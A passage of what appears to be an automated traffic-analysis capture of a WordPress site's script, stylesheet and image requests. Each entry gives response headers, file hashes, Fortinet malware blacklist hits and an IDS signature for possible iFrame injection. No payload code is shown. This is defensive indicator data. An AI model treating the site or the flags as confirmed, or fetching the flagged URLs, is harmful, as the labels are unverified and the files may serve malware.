User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:46 GMT
Etag: "686f-51fcfe51b0d80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11762
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11762
Md5:    754355a06c13b892e3b696fc8fa731eb
Sha1:   53595e3de543cad4317fb3ee38d9bf87fca53042
Sha256: 8f718e22ca0f0f6f90135a8a18ad3cfa8a0c1c08b63e302e468ecc7930eece64

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:48 GMT
Etag: "32d2-51fcfe5399200-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6726
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6726
Md5:    b5dacc6be77582ec5eab717f3745bbd5
Sha1:   337f110ac383363cb7357343a2fb4ba7fe1a1e1b
Sha256: 0a21f84f6d10316670ccbe86971550dae63de040772c40c32452713a778a253f

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:55 GMT
Etag: "2f7a-51fcfe5a461c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6322
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6322
Md5:    bcd8bbd6726f431a7e44acc83d337fe3
Sha1:   b8500a66b29f080570add7677eafdd098c06ad63
Sha256: 4810a15066203732004e4ee3d4691f4625cb0e0d3395d6e774fec8c7069dbed5

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:53 GMT
Etag: "322b-51fcfe585dd40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6192
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6192
Md5:    9b0e9fc3a5f00c3ed996c404673273de
Sha1:   09ac92fa4453fe25a0640a02a1153c60e94909a5
Sha256: 3d301470e58a1e24d63b2b07af7cb8de77e43ddaec13c10a9daf0c5ab00c87f3

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:53 GMT
Etag: "7833-51fcfe585dd40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12973
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12973
Md5:    23ddafd6f060f5a0c0e464d4cb3b7120
Sha1:   523913dd1298e15aa9322c4704c18c70df8ee105
Sha256: 7ba254ac6598e69bdbd27697232f05fb81a93ec981d3ae0d59e59bc47e76ad04

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.1 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:42 GMT
Etag: "4d40-51fcfe4de0480-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8200
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8200
Md5:    e93923516fe5f6111644129f881b4895
Sha1:   879e8b0e4ab2b3ef84d0fb2ec435fab8dd7705bf
Sha256: f13a0e2982ec4ec9fa99e1718b6767a5950db2a74c2570ca29de8caca9c11afc

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.1 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:35 GMT
Etag: "66cc-51fcfe47334c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10568
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10568
Md5:    2c93d5fb733fffcafaeb4ead8d257726
Sha1:   1da9a7cb0ff161a14bbae628098ce27ff3d5729a
Sha256: 8ea6f13a05d88c8a25927717549b2146a72b4dae3dc86f91c88ebcdc215f31bb

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:52 GMT
Etag: "47b6-51fcfe5769b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7799
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7799
Md5:    39105ccd7337880fa319944cf5c05fd6
Sha1:   e6ff713fb7e998ab2c7cc1eb8377869e4f56e86d
Sha256: 1b939b507a7683cc1a3ed7f601cd7698afbba4182b20ccbe2d9b92ee58b5e1cc

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:26 GMT
Etag: "2fed-51fcfe3e9e080-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6149
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6149
Md5:    d56df0858d8d7faa3404fe8139c9a4df
Sha1:   883ff6042c50c83ad1c87fb3c7085b7fa60354cf
Sha256: 139b9e3db9cf8ec64d7d050d5116d94ae413cabfb6010f29d1b7941a4aadb982
                                        
GET /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:44 GMT
Etag: "60b6-51fcfe4fc8900-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11198
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11198
Md5:    c9de95dbbc97ce7160ba9a16c05bb6da
Sha1:   0d79f57092bd0ddbf4bead6d1e754594f3e427e3
Sha256: 9d7d734a13586e6333afe8fad8f8db888997f2a013ff00a8a465ab10b46a25ef
                                        
GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:55 GMT
Etag: "324f-51fcfe5a461c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6192
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6192
Md5:    852592f8df5029bb22e436c487d5e71a
Sha1:   f6f0404237ff6faa6eefcc9657a9d529ec454c06
Sha256: 4875abc149a886f65cfc25068683ecef7d1b3d578835076312b44c87087040a3

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:43 GMT
Etag: "4f2d-51fcfe4ed46c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7986
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7986
Md5:    f2ae15f736573a998532ff3aec4744da
Sha1:   6c70c97654709f37bf300d2c223d403c1c610aed
Sha256: 38c69d8cbbd7edb2cf2bde363189b45995d76bd94cb0acb22aa2e054c4d51a83

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:39 GMT
Etag: "f96c-51fcfe4b03dc0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 18664
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   18664
Md5:    38e7cb151cc0fdd0c67c334a59c47732
Sha1:   8b300d1b82272297e074c845dc3c1fd1f735ea03
Sha256: c5ec22b271a0fbcea77a1fd5ec43cae70bd1aab0fc96ca87b4c5a4ca77f6a1a1
                                        
GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:51 GMT
Etag: "c14e-51fcfe56758c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 14120
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   14120
Md5:    a84bbac7f8acebf0a41a72ece855421b
Sha1:   a44534405fd33a6e89d05413bed607d960948b90
Sha256: 09b5a40e4c123ece4d61968fbc5c973acbea3dbdfc2b5b57af4b487a886b1c99

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/jquery.debouncedresize.js?ver=1.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:26 GMT
Etag: "28c8-51fcfe3e9e080-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5646
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5646
Md5:    206abf914f54750ee9245c9d3c78fdc6
Sha1:   785dc395f21eec34bb069fa49c3a793651988d46
Sha256: 091c105a7858df0bf4c2497187791297865887f6844f7a919e3c0dd68a71c734

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/jquery.ba-resize.min.js?ver=1.1 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:54 GMT
Etag: "2bc9-51fcfe5951f80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6049
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6049
Md5:    c0ddb751d08133a85d78b54f2c68991a
Sha1:   1d3ac8fb3b5b1843d91a515601741001b968dfcc
Sha256: ceb1ef8c6d1c583aade971d448be3a6a1d4dc413dc1107ae4654cda6d4a56938

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/themes/CherryFramework/js/jquery.isotope.js?ver=1.5.25 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:51 GMT
Etag: "6430-51fcfe56758c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10364
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10364
Md5:    cd7abf8023db97a714ad5e6e8a1b0ebd
Sha1:   67d60ceeb3ff20a6a717fb8ea3386137d58c5937
Sha256: fcad84d789f822a09092123193e742de063bde2e4840ff6c324bda2a39aa591b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:33 GMT
Etag: "3fda-51fcfe454b040-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7435
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7435
Md5:    4a179e3a48ad606c6fdcade02acfd894
Sha1:   e1a8662cb6b7459e30836bc16813075f0267ebea
Sha256: a035ecba75b237479f46e8a81c235fc5cc7d7d3158fcd045ce780dee28228e56

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:36 GMT
Etag: "2b9a-51fcfe4827700-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5829
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5829
Md5:    da8784c481c134add1cf19b202e0cac8
Sha1:   2d2a8b6bdd9dea5220ce8602eb4bdc34eece46bc
Sha256: 2078d83235c33f4d417d3a525e987e4ff843fbd9e544fe6eee6445e0b63365aa

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/style.css HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/theme48340/main-style.css

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:36 GMT
Etag: "209-5041b27728d00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 335
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   335
Md5:    0ab128c145dc02dc014a9dd3a3543553
Sha1:   2e0580f6e59871686833a1f0e25f428cab0a7500
Sha256: cab7f859ace57ab9bc60e1ccffb6d02027ab06a0eb15dda0ce47de52ccebb3e9
                                        
GET /wp-content/themes/theme48340/images/icon1.png HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "8e6-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2278
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 34 x 76, 8-bit/color RGBA, non-interlaced
Size:   2278
Md5:    7b42b09e7925afe9ecfd14c9a9d47768
Sha1:   10b8dd3b73df84b20aee12846045bb46b32c38da
Sha256: 504f8be6e45e8c3ed6699c85747d77c6dfd45c5fe23c33ffc8bd13a3e5d0b584
                                        
GET /wp-content/themes/theme48340/images/icon2.png HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "73f-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 1855
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 35 x 76, 8-bit/color RGBA, non-interlaced
Size:   1855
Md5:    c2e3d11fb3429fbdd51ac7a9393b751f
Sha1:   ea3c9a397a678dace20cbb44277f320b8dd06065
Sha256: db3014b9b3b773a71e53322650b048dd12bbc36017991d3441a381be934f2210
                                        
GET /wp-content/themes/theme48340/images/icon3.png HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
